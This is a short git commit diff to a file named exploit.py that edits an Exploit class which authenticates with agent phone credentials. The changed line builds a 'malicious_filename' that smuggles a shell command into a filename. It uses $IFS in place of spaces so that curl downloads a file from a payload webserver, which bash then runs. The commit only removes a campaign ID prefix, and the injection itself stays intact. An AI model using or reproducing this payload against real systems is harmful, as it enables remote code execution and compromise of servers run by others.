Remove campaign ID from the payload

2024-09-16 01:13:01 +02:00
parent 1e5c4a51b3
commit 83c9bd5e9c
1 changed files with 1 additions and 1 deletions
--- a/exploit.py
+++ b/exploit.py
@@ -562,7 +562,7 @@ class Exploit:
            self.custom_print(f"Authenticated as agent using phone credentials", "+")

            try:
-                malicious_filename = f"{self.CAMPAIGN_ID}1337$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})"
+                malicious_filename = f"$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})"
                session_name = re.findall(
                    r"var session_name = '([a-zA-Z0-9_]+?)';", response.text
                )[0]